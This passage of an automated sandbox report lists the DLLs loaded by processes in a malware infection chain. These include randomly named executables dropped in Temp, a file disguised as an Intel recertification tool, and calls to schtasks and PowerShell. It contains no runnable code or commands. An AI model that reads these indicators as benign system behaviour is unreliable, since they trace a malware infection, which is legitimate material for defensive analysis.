Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019315001\5f0a381314.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: ureg.dll Jump to behavior
Source: C:\Windows\System32\mode.com Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019316001\b2885fa695.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019317001\72f44ceb0a.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1019318001\4115805b10.exe Section loaded: samlib.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: apphelp.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1019319001\b7c03317c9.exe Section loaded: nlaapi.dll
